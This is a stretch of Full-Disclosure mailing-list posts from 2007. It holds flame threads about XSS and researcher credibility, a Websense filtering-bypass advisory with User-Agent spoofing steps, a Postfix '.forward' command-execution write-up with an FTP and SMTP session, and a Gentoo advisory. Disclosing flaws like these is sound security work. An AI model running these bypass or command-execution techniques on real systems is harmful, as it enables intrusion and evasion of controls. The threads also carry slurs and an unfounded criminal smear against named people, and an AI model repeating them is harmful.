Re: [Full-disclosure] Full-Disclosure Digest, Vol 34, Issue 31
On Dec 12, 2007 9:01 PM, Andrew A [EMAIL PROTECTED] wrote: PPS-- Namedropping the head of a project you plagiarized from in your cover letter is not good policy. Especially in this industry. Its a smaller world than most, and now you're blackballed buddy. You'll work as desktop support at FOX forever. On this list you may act like the lack of credit was some sort of forgetful slip, but most people have been relayed by now that you directly claimed authorship of said shellcode in an interview. Andrew, you certainly are misinformed. I did not claim authorship for anything, as you say. I don't even know who this individual is that you are talking about. The only thing I can think of that you have mentioned is something I put together for H D Moore and the metasploit team to resolve the licensing issues for getting msf3 into Ubuntu's multiverse repository. You can see the full efforts of this, and some of my code, at the link below... https://bugs.launchpad.net/ubuntu/+bug/102212 Some stuff was sent to the msfdev list as well, so if you are on that team, you would know. All I wanted to do was clean up the msf3 code to meet Debian package specifications. However, it was not possible to get msf3 into Debian/Ubuntu without violating the Metasploit license. H D did say they may rewrite the license in a future version. Even if I mentioned this msf3 effort during an interview, and I don't even recall if I did, then your point is still moot. I tried to do something for the community of users who run msf on Linux, which was make metasploit more accessible to them. If you think that's bad, then thats fine. This whole discussion started with presenting the fact that the favicon issue could be a useful attack vector that people may not have thought of before. I can't change the fact that people in the security community will always be hostile. There is something about this community, and it doesn't happen like this anywhere else, where people can be just so belligerent. I try to have fun and have a good time in/out of work, and maybe you don't know that about me. I am light-hearted and enjoy the company of my peers. Ask anyone who has had a drink with me, or even too many drinks! We always have fun. Even if I poke fun at people, it is usually in a fair way, showing reason to feel that way. Your attitude is based on things which are made up, false, and you have no base to stand on with such hostility. Just turn that frown upside-down and remember that life shouldn't be so serious. Take it easy and have fun. It is not the end of the world. I will buy some beers to chill your hot head if you like... -- Kristian Erik Hermansen I have no special talent. I am only passionately curious. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
http://www.google.com/search?q=%22Dude+VanWinkle%22+popsicle Nice work Dude! YAY! On Dec 12, 2007 11:00 PM, Dude VanWinkle [EMAIL PROTECTED] wrote: BTW: http://www.google.com/search?hl=enq=%22Fredrick+Diggle%22+%2B2003btnG=Search Nice work Fred! On Dec 12, 2007 10:32 PM, Fredrick Diggle [EMAIL PROTECTED] wrote: Yes way to go MW you made his day! MW I understand how hard it is to turn things into viable exploits :(... sometimes the best move is just to wait for the metasploit guys to do it. They are elite at bof sploitin' etc. You should stick to the more interesting research like XSS and SQL tampering : also Dude, your pillow joke was damn hilarious :D how did you think of it? can you give me joke lessons? Maybe he will stuff a pillow in there in order to help curb the urge to give n3td3v repeated blowjobs on the hour, every hour.. ^--- Comedy Platinum (better than gold) YAY! On Dec 12, 2007 8:38 PM, Dude VanWinkle [EMAIL PROTECTED] wrote: On Dec 12, 2007 3:38 AM, Morning Wood [EMAIL PROTECTED] wrote: One of my first advisories and was rediscovered later, turned into a viable exploit 2 years after by another researcher. http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77 *hugz* Thanks for this MW. Made my freaking day (admittedly not hard to do, but still) I am sure now reepex (http://reepex.com) will learn from his mistake and stop being such a douchebag, and shut his mouth. Maybe he will stuff a pillow in there in order to help curb the urge to give n3td3v repeated blowjobs on the hour, every hour.. If he feels like doing so, I know a great site to buy the pillows from (http://reepex.com) -JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] on xss and its technical merit
Saying XSS isn't a vulnerability is like like saying a binary that has a buffer
overflow isn't vulnerable. XSS needs javascript , binary needs its own malcode
as well.
Every vulnerability needs a medium to be exploited.
Naysayers of XSS want some elegant exciting actions. Its not. Its a case of not
sanitizing input that allows arbitrary code to be executed. Simple things like
umm secure coding, url scan, mod_security, noscript could combat this easily.
Its like someone walking past a car and seeing a million dollars sitting in the
front seat. Thief opens unlocked door and takes money. Now a more elegant way
would be to manipulate the chemical composition of the glass back to a gaseous
form and reaching through. Either way the loot is gone.
I really dont understand why some in this community are so quick to say this is
no find, this isnt new, this is insert blah. I guess it makes them feel
intelluctually superior to tear down the ideas of others whether they deserve
it or not. In some cases they do. Are members of this community so starved for
their own self worth that they strive to squash the ideas of others
instinctively? Would make for a interesting study.
Jay scriptalert('YAY!')/script
- Original Message -
From: Fredrick Diggle [mailto:[EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Wed, 12 Dec 2007 13:17:18 -0600
Subject: Re: [Full-disclosure] on xss and its technical merit
Thank you info sec guru for your glowing review. Did you even read my post?
I think I explained quite succinctly why XSS is not a vulnerability. Do you
have some argument with what I posted or are you going to stick with
criticizing my tone? You win oh guru of the info sec industry thing.
3 fredrick
YAY!
On Dec 12, 2007 12:57 PM, Jay [EMAIL PROTECTED] wrote:
Its amazing the last 2 posters even have to time to read FD. With all the
super important super secret projects they must be working. They preface
everything with Im not going to put much thought into this then proceed to
vomit a bunch of useless rhertoic throwing in how trivial it is and how much
experience they have beating up 10 year olds or something.
I actually think this thread should die as 1 side of the house believes
XSS and XSRF as viable attack vectors. The other side thinks its rubbish.
So let it die and then all the folks who are so bored yawn with XSS and
CSRF can post their remarkable works and amaze us all.
Jay
- Original Message -
From: Fredrick Diggle [mailto:[EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Wed, 12 Dec 2007 12:21:14 -0600
Subject: Re: [Full-disclosure] on xss and its technical merit
What no one seems to realize is that XSS by its very nature is not a
vulnerability. It is a perfectly valid mechanism to aid in exploitation
but
can anyone cite me an example where xss in and of itself accomplishes
anything? I can think of pretty much 3 examples of XSS (granted without
giving it much thought because lets face it it isn't worth much thought)
1. you are taking something from a user which is accessible from the
scripting language context of their browser.
In this case the vulnerability is not XSS the vulnerability is either
that
you (or the web browser) are storing something valuable in an insecure
way.
The most obvious example of this is something like session cookies which
if
your auth/session management is implemented in a secure way won't matter a
bit. It follows that the vulnerability is not XSS but instead that some
developer stored something valuable in a stupid way. All of the retards on
the list will no doubt ask me for a secure session management schema but
I
am a firm believer that sharing is communism so screw you.
2. You are forcing the users browser to make a request and complete some
task within the context of the application.
In this case again the vulnerability is not XSS but instead that the
application allows users to do important things without verifying who they
are. this is request forgery not xss, xss is only the mechanism by which
the exploit is carried out. so again xss is not a vulnerability.
3. You are doing some other funkiness through the scripting language (all
that crap about internal network scanning comes to mind)
AGAIN this is not a vulnerability. If it is possible to do this crap
through xss then it is also possible through any website the user visits.
That means that if this crap is doable then you should report it to the
guys
who develop the scripting language backend and not some guy who doesn't
sanitize things that he outputs. so once more the vulnerability is NOT xss
it is an issue with the scripting language.
The only other case that you could make for this is ui defacement I guess
but in that case the vuln is not xss but that the developer didn't
properly separate user generated content from backend content to make it
clear that the content in these areas
Re: [Full-disclosure] on xss and its technical merit
Naysayers of XSS want some elegant exciting actions. Its not. Its a case of not sanitizing input that allows arbitrary code to be executed. Simple things like umm secure coding, url scan, mod_security, noscript could combat this easily. That is probably the largest part of what makes it such a boring topic. The easier an attack is to defend against, probably the less exciting it is. It's hardly exciting to 'break into' someone's house through an unlocked door; there's no challenge. Its like someone walking past a car and seeing a million dollars sitting in the front seat. Thief opens unlocked door and takes money. Now a more elegant way would be to manipulate the chemical composition of the glass back to a gaseous form and reaching through. Ah, now THAT would be cool :) I really dont understand why some in this community are so quick to say this is no find, this isnt new, this is insert blah. You deal with this kind of crap professionally for a couple years and then tell me how excited you are to come into work in the morning just so you can pour over hours and hours of crud to make your customers happy. It's boring. There's no meat to it. It's rote. It sucks the life out of your day. I regret ever saying that nothing could be worse than writing CGI checks. I guess it makes them feel intelluctually superior to tear down the ideas of others whether they deserve it or not. In some cases they do. That might be part of it, who knows, for myself or maybe others. I'm not a shrink. But to me it's more about wanting to see the boundaries pushed and being exposed to new, exciting stuff. Are members of this community so starved for their own self worth that they strive to squash the ideas of others instinctively? Would make for a interesting study. Would probably just show that there's alot of pubescent teenagers jockeying for social position. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] on xss and its technical merit
Once again you completely fail at reading comprehension. Let me help.
1. Saying XSS isn't a vulnerability is like like saying a binary that has a
buffer overflow isn't vulnerable.
Wrong! An application coded in a way that allows a user to write data past
the end of the memory allocated for that data contains a flaw. An
application which outputs arbitrary user input does not contain a flaw. The
intended purpose was to output the user input verbatim and that is exactly
what the code does. If this functionality allows an attacker to in some way
gain something useful then the vulnerability exists in the component which
allowed this. I think that I covered the possibilities and their associated
components in my initial mail.
2. XSS needs javascript , binary needs its own malcode as well.
Blatantly incorrect! XSS does not require javascript, it requires the
browser to interpret input rather than simply display it (this generally
means certain input is parsed and interpreted as a scripting language
(javascript is ONE scripting language and therefore NOT a requirement)).
Also what the heck is malcode? If you are implying that to exploit an
application which has been compiled into bytecode which can be directly
interpreted by the target architecture that I must introduce my own bytecode
into memory and force the processor to execute it then you are sorely
mistaken. It would depend greatly on the type of vulnerability, the context
in which the code is running, and the attackers creativity. Also generally
people use the word shellcode but that is just semantics.
3. Every vulnerability needs a medium to be exploited.
I guess if by medium you mean the ability to perceive and possibly (but
not necessarily) interact with the system in question. If code has a bug
which unintentionally sends users passwords to FD on the 3rd of every month
I suppose that wouldn't be a vulnerability by your definition?
4. Naysayers of XSS want some elegant exciting actions. Its not.
Did I ever ask for elegance? I asked what the inherent vulnerability in
redisplaying user input is.
5. Its a case of not sanitizing input that allows arbitrary code to be
executed.
arbitrary code? really?
6. Simple things like umm secure coding, url scan, mod_security, noscript
could combat this easily.
I reference my initial suggestion that someone get busy building some
horribly complex way to make function pointers impossible to overwrite.
There is a lot of money to be made.
7. Its like someone walking past a car and seeing a million dollars sitting
in the front seat. Thief opens unlocked door and takes money. Now a more
elegant way would be to manipulate the chemical composition of the glass
back to a gaseous form and reaching through. Either way the loot is gone.
No. I would agree that both of those examples are exploitation. I disagree
that either of them has anything to do with XSS however. In this situation
XSS would be the equivalent of following the owner to the bank where he
deposits it, dressing up as him and trying to get the bank to release his
money to you. The vulnerability would not be your ability to dress up as him
but the bank's stupidity in buying it.
8. I really dont understand why some in this community are so quick to say
this is no find, this isnt new, this is insert blah. I guess it makes them
feel intelluctually superior to tear down the ideas of others whether they
deserve it or not. In some cases they do.
Like you, now?
9. Are members of this community so starved for their own self worth that
they strive to squash the ideas of others instinctively? Would make for a
interesting study.
Perhaps you should pursue this as security apparently isn't your niche :
10. Jay scriptalert('YAY!')/script
Are you the guy that has been releasing all that exploit code to
milw0rm? please stop you are clogging the pipes.
YAY!
On Dec 13, 2007 7:55 AM, Jay [EMAIL PROTECTED] wrote:
Saying XSS isn't a vulnerability is like like saying a binary that has a
buffer overflow isn't vulnerable. XSS needs javascript , binary needs its
own malcode as well.
Every vulnerability needs a medium to be exploited.
Naysayers of XSS want some elegant exciting actions. Its not. Its a case
of not sanitizing input that allows arbitrary code to be executed. Simple
things like umm secure coding, url scan, mod_security, noscript could combat
this easily.
Its like someone walking past a car and seeing a million dollars sitting
in the front seat. Thief opens unlocked door and takes money. Now a more
elegant way would be to manipulate the chemical composition of the glass
back to a gaseous form and reaching through. Either way the loot is gone.
I really dont understand why some in this community are so quick to say
this is no find, this isnt new, this is insert blah. I guess it makes them
feel intelluctually superior to tear down the ideas of others whether they
deserve it or not. In some cases they do. Are members of this
Re: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass
An added note on this... Customers do not need to download nor install any new patch for this fix. It was automatically updated and installed with our nightly protocol signature updates. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of The Security Community Sent: Wednesday, December 12, 2007 3:32 PM To: [EMAIL PROTECTED]; Full-Disclosure Subject: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass Mr. HinkyDink would like to share the following with the Security Community... -- Forwarded message -- From: [EMAIL PROTECTED] Date: Dec 12, 2007 6:05 PM Subject: Websense 6.3.1 Filtering Bypass To: [EMAIL PROTECTED] Please share this with your little friends... -- Websense Policy Filtering Bypass discovered by mrhinkydink PRODUCT: Websense Enterprise 6.3.1 EXPOSURE: Web Filtering Bypass SYNOPSIS By spoofing the User-Agent header it is possible to bypass filtering and, to a lesser extent, monitoring in a Websense Enterprise 6.3.1 environment. PROOF OF CONCEPT The following was tested in an unpatched 6.3.1 system using the ISA Server integration product. It is assumed it will work with other integration products but this has not been tested. Other User Agents may also work. I. Install FireFox 2.0.x II. Obtain and install the User Agent Switcher browser plug-in by Chris Pederick III. Add the following User Agents to the plug-in Description: RealPlayer User Agent : RealPlayer G2 Description: MSN Messenger User Agent : MSMSGS Description: WebEx User Agent : StoneHttpAgent IV. Change FireFox's User Agent to any one of the preceding values V. Browse to a filtered Web site VI. Content is allowed Content browsed via this method will be recorded in the Websense database as being in the Non-HTTP category. Demonstration: http://www.youtube.com/watch?v=pKv41ge8XcQ SEE ALSO Websense KnowledgeBase article #976 The vendor acknowledges this behavior in the aforementioned article. WORKAROUND == Disable the protocols mentioned above. VENDOR RESPONSE === Websense has repaired this issue in database #92938 NOTICE == mrhinkydink is not to be confused with the blogger by the same name at www.dailykos.com c. MMVII mrhinkydink ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Protected by Websense Messaging Security ? www.websense.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] on xss and its technical merit
I can see how my explanation would make very little sense to someone with as little technical ability as yourself. I feel badly as perhaps my antics have threatened what you hope to one day turn into a career. Unfortunately I think that you will find it difficult finding a job based solely on your detailed technical knowledge of all things xss. I have perused many careers on the monster dot com and after much perusal have decided to stick with what I know. To answer what I believe your question was intended to be I am currently employed by the Sao Paolo Zoo, I work primarily with primates but have also periodically been asked to brush the hippopatamus' teeth (a task which I do not particularly enjoy as ). You are rather stupid so don't be too hard on yourself for feeling that way. I posted only one initial email on this topic and have merely responded to other's attacks since then. YAY! On Dec 13, 2007 10:33 AM, pdp (architect) [EMAIL PROTECTED] wrote: bravo :) this is the most senseless explanation I have ever seen, perhaps you should peruse a different career as well... I am not trying to be funny but I couldn't resist to write to you in person after seeing your email. Cheers and good luck. pdp P.S. btw, what do you do for a leaving? and btw, I feel stupid since it is more then obvious this conversation is made up and mainly between the same guy posting from different emails. so, please stop. it is getting really out of control and it is rather annoying, On Dec 13, 2007 3:36 PM, Fredrick Diggle [EMAIL PROTECTED] wrote: Once again you completely fail at reading comprehension. Let me help. 1. Saying XSS isn't a vulnerability is like like saying a binary that has a buffer overflow isn't vulnerable. Wrong! An application coded in a way that allows a user to write data past the end of the memory allocated for that data contains a flaw. An application which outputs arbitrary user input does not contain a flaw. The intended purpose was to output the user input verbatim and that is exactly what the code does. If this functionality allows an attacker to in some way gain something useful then the vulnerability exists in the component which allowed this. I think that I covered the possibilities and their associated components in my initial mail. 2. XSS needs javascript , binary needs its own malcode as well. Blatantly incorrect! XSS does not require javascript, it requires the browser to interpret input rather than simply display it (this generally means certain input is parsed and interpreted as a scripting language (javascript is ONE scripting language and therefore NOT a requirement)). Also what the heck is malcode? If you are implying that to exploit an application which has been compiled into bytecode which can be directly interpreted by the target architecture that I must introduce my own bytecode into memory and force the processor to execute it then you are sorely mistaken. It would depend greatly on the type of vulnerability, the context in which the code is running, and the attackers creativity. Also generally people use the word shellcode but that is just semantics. 3. Every vulnerability needs a medium to be exploited. I guess if by medium you mean the ability to perceive and possibly (but not necessarily) interact with the system in question. If code has a bug which unintentionally sends users passwords to FD on the 3rd of every month I suppose that wouldn't be a vulnerability by your definition? 4. Naysayers of XSS want some elegant exciting actions. Its not. Did I ever ask for elegance? I asked what the inherent vulnerability in redisplaying user input is. 5. Its a case of not sanitizing input that allows arbitrary code to be executed. arbitrary code? really? 6. Simple things like umm secure coding, url scan, mod_security, noscript could combat this easily. I reference my initial suggestion that someone get busy building some horribly complex way to make function pointers impossible to overwrite. There is a lot of money to be made. 7. Its like someone walking past a car and seeing a million dollars sitting in the front seat. Thief opens unlocked door and takes money. Now a more elegant way would be to manipulate the chemical composition of the glass back to a gaseous form and reaching through. Either way the loot is gone. No. I would agree that both of those examples are exploitation. I disagree that either of them has anything to do with XSS however. In this situation XSS would be the equivalent of following the owner to the bank where he deposits it, dressing up as him and trying to get the bank to release his money to you. The vulnerability would not be your ability to dress up as him but the bank's stupidity in buying it. 8. I really dont understand why some in this community are so quick to say this is no find, this isnt new, this is insert
Re: [Full-disclosure] on xss and its technical merit
4. use xss to IFRAME or otherwise leverage a client exploit imho this is by far worse than any of the other vectors mentioned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 34, Issue 31
On Dec 13, 2007 12:10 AM, Kristian Erik Hermansen [EMAIL PROTECTED] wrote: Andrew, you certainly are misinformed. I did not claim authorship for anything, as you say. You have no credibility. You've been spewing lies and claims of shellcode authorship in a bunch of interviews in San Francisco. I have heard from multiple people about your claims in interviews. These people I have known for years as solid reverse engineers and exploit developers. They have worked for years in pentesting, vuln assessment and auditing, and -never plagiarized the work of others-. You work as desktop support and insult your employer in your shitty blog. The entire SF based infosec scene is fucking laughing at your antics. Personally, I stopped laughing and can feel only disgust at your very presence. This whole discussion started with presenting the fact that the favicon issue could be a useful attack vector that people may not have thought of before. I can't change the fact that people in the security community will always be hostile. No, this discussion started when you claimed that there was a gmail/google bug, all accounts vulnerable. Lets run through the definition of web app vulnerability for your vuln. Can you: * Steal a cookie or otherwise execute privileged javascript on the target while the user is logged in? -no- * Perform priviledged actions upon a user's account while they are logged in? -no- * Access private data, such as email content? -no- You are a worthless fraud, a hype machine. This would be hilarious if you were intelligent and trying to infuriate people, but instead you're hoping someone reading this list will be dumb enough to hire you. Sorry, try again Kristen. You're just setting yourself up to be the next n3td3v. Ask anyone who has had a drink with me, or even too many drinks! Passionately bi-curious queer date rapist? Even if I poke fun at people, it is usually in a fair way, showing reason to feel that way. Your attitude is based on things which are made up, false, and you have no base to stand on with such hostility. I have every base to stand on when calling out a lying, plagiarizing fraud. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
im so hurt now... you make me feel so small compared to your great worx MrReepass stfu kthnx - Original Message - From: reepex [EMAIL PROTECTED] To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wednesday, December 12, 2007 9:01 PM Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability wow thats quite impressive.. you couldnt exploit a basic overflow and two years later someone else did you must be quite proud. Did you tell your family and co workers about this great finding? I hear tipping point and idefense are hiring you should forward them this set of emails. On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote: One of my first advisories and was rediscovered later, turned into a viable exploit 2 years after by another researcher. http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77 *hugz* - Original Message - From: reepex [EMAIL PROTECTED] To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Tuesday, December 11, 2007 1:58 PM Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability are you serious? http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html I guess you are a 'brain dead india wannabe sec researcher' also? On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote: advisories like this are typical of brain dead India wannabe sec researchers nuff said ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Checkpoint security email
Does anyone have a direct email contact for Checkpoint / Security to report a vulnerability? I've gone through their portal, and attempted to create a ticket but have received errors and not met with any success. Thanks, Mike ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
so are you now admitting your vulnerability was worthless? On Dec 13, 2007 12:02 PM, Morning Wood [EMAIL PROTECTED] wrote: im so hurt now... you make me feel so small compared to your great worx MrReepass stfu kthnx - Original Message - From: reepex [EMAIL PROTECTED] To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wednesday, December 12, 2007 9:01 PM Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability wow thats quite impressive.. you couldnt exploit a basic overflow and two years later someone else did you must be quite proud. Did you tell your family and co workers about this great finding? I hear tipping point and idefense are hiring you should forward them this set of emails. On Dec 12, 2007 2:38 AM, Morning Wood [EMAIL PROTECTED] wrote: One of my first advisories and was rediscovered later, turned into a viable exploit 2 years after by another researcher. http://framework.metasploit.com/exploits/view/?refname=windows:ftp:netterm_netftpd_user http://metasploit.com:5/EXPLOITS?MODE=SELECTMODULE=%6e%65%74%74%65%72%6d%5f%6e%65%74%66%74%70%64%5f%75%73%65%72%5f%6f%76%65%72%66%6c%6f%77 *hugz* - Original Message - From: reepex [EMAIL PROTECTED] To: Morning Wood [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Tuesday, December 11, 2007 1:58 PM Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability are you serious? http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2003-07/0259.html I guess you are a 'brain dead india wannabe sec researcher' also? On Dec 11, 2007 6:22 AM, Morning Wood [EMAIL PROTECTED] wrote: advisories like this are typical of brain dead India wannabe sec researchers nuff said ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass
automatic updates with notification? Silent patching? Microsoft tactics? I also knew websense was a joke but now you have come to this? On Dec 13, 2007 8:49 AM, Hubbard, Dan [EMAIL PROTECTED] wrote: An added note on this... Customers do not need to download nor install any new patch for this fix. It was automatically updated and installed with our nightly protocol signature updates. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of The Security Community Sent: Wednesday, December 12, 2007 3:32 PM To: [EMAIL PROTECTED]; Full-Disclosure Subject: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass Mr. HinkyDink would like to share the following with the Security Community... -- Forwarded message -- From: [EMAIL PROTECTED] Date: Dec 12, 2007 6:05 PM Subject: Websense 6.3.1 Filtering Bypass To: [EMAIL PROTECTED] Please share this with your little friends... -- Websense Policy Filtering Bypass discovered by mrhinkydink PRODUCT: Websense Enterprise 6.3.1 EXPOSURE: Web Filtering Bypass SYNOPSIS By spoofing the User-Agent header it is possible to bypass filtering and, to a lesser extent, monitoring in a Websense Enterprise 6.3.1 environment. PROOF OF CONCEPT The following was tested in an unpatched 6.3.1 system using the ISA Server integration product. It is assumed it will work with other integration products but this has not been tested. Other User Agents may also work. I. Install FireFox 2.0.x II. Obtain and install the User Agent Switcher browser plug-in by Chris Pederick III. Add the following User Agents to the plug-in Description: RealPlayer User Agent : RealPlayer G2 Description: MSN Messenger User Agent : MSMSGS Description: WebEx User Agent : StoneHttpAgent IV. Change FireFox's User Agent to any one of the preceding values V. Browse to a filtered Web site VI. Content is allowed Content browsed via this method will be recorded in the Websense database as being in the Non-HTTP category. Demonstration: http://www.youtube.com/watch?v=pKv41ge8XcQ SEE ALSO Websense KnowledgeBase article #976 The vendor acknowledges this behavior in the aforementioned article. WORKAROUND == Disable the protocols mentioned above. VENDOR RESPONSE === Websense has repaired this issue in database #92938 NOTICE == mrhinkydink is not to be confused with the blogger by the same name at www.dailykos.com c. MMVII mrhinkydink ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Protected by Websense Messaging Security ? www.websense.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] on xss and its technical merit
WRONG! Once again xss is not the exploit it is just the delivery mechanism. You aren't doing anything here that you couldn't also do by posting the exploit on your damn live journal right next to the paris hilton video. Did you end up paying damages? YAY! On Dec 13, 2007 11:46 AM, Morning Wood [EMAIL PROTECTED] wrote: 4. use xss to IFRAME or otherwise leverage a client exploit imho this is by far worse than any of the other vectors mentioned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Small Design Bug in Postfix - REMOTE
Small Design Bug in Postfix - REMOTE There's a small issue on how Postfix forwards mails. A user can have a .forward file in her home directory. Inside this file she can specifiy an alternative recipient or use aliasing to execute commands when mail is received. From the manpage ALIASES(5) aliases - Postfix local alias database format |command Mail is piped into command. Commands that contain special characters, such as whitespace, should be enclosed between double quotes. See local(8) for details of delivery to command. When the command fails, a limited amount of command output is mailed back to the sender. The file /usr/include/sysexits.h defines the expected exit status codes. For example, use |exit 67 to simu- late a user unknown error, and |exit 0 to implement an expensive black hole. This is fine since postfix properly drops privileges before executing the command. The Problem with executing commands via .forward files is that if someone manages to place a file into ones home directory and just sends a file to the mailserver she can execute commands even when she's not supposed to or does not have the privileges. Here is an example exploitation session, the user 'rootkey' only has ftp access with write permissions and no other privileges than that. Login to FTP server telnet box 21 USER rootkey PASS rootkey123 logged in Put .forward file with following contents into the home directory of user 'rootkey'. ---snip--- |touch /tmp/XXX ---snip--- put .forward Now send an email to user rootkey. telnet box 25 mail from: rootkey rcpt to: rootkey data . RESULT: [EMAIL PROTECTED]:~$ ls /tmp/testXXX /tmp/testXXX signed, - -kcope/2007 -- GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS. Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ GLSA 200712-11 ] Portage: Information disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200712-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Portage: Information disclosure Date: December 13, 2007 Bugs: #193589 ID: 200712-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Portage may disclose sensitive information when updating configuration files. Background == Portage is the default Gentoo package management system. Affected packages = --- Package / Vulnerable / Unaffected --- 1 sys-apps/portage 2.1.3.11 = 2.1.3.11 Description === Mike Frysinger reported that the etc-update utility uses temporary files with the standard umask, which results in the files being world-readable when merging configuration files in a default setup. Impact == A local attacker could access sensitive information when configuration files are being merged. Workaround == There is no known workaround at this time. Resolution == All Portage users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =sys-apps/portage-2.1.3.11 References == [ 1 ] CVE-2007-6249 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6249 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200712-11.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org 